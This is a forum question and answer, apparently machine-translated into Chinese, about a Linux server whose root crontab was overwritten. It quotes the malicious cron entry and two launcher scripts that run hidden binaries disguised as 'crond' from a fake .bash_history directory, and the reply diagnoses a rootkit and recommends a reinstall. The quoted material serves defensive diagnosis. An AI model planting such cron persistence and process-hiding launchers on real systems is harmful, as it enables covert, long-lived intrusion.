我试图弄清楚我的/ var / spool / crontab / root是否被病毒或恶意代码覆盖:
我今天早上醒来,我的/ var / spool / crontab / root文件是空的,除了这行,这不是我写的:
* * * * * /usr/home/.bash_history/update > /dev/null 2>&1
我查找了设置为运行的更新文件,这是它包含的内容:
#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null
该更新文件调用名为 run 的文件,其中包含:
#!/bin/bash
ARCH=`uname -m`
HIDE="crond"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./run64
fi
答案 0 :(得分:0)
我认为你被黑客入侵,可能是有人使用可下载的rootkit。任何有调制解调器的白痴都可以使用它们,其中许多人在成功入侵后甚至不知道如何处理系统。
您可以做的最安全的事情是从头开始重新安装操作系统,这次使用多更强的密码。 (对不起,“pa $$ w0rd”不要削减它。)你可能只是尝试更改密码并在系统中搜索任何可疑的东西,但很有可能改变了你永远不会认出的东西。
我有一个系统被黑了一次,他们取代了“ls”,“ps”,谁知道其他命令用替代品跳过他们的干预,使我们更难以100%确定我们找到了修正了他们所有的变化。
重新安装后,查看如何将阴影散列转换为使用SHA512。默认的散列算法存储在/etc/login.defs中,可能是MD5,现在还不够强大。但即使使用更强大的哈希,许多弱密码也会迅速陷入蛮力攻击。
当你参与其中时,你可能会获得CentOS 6.9,它将包含更多安全补丁。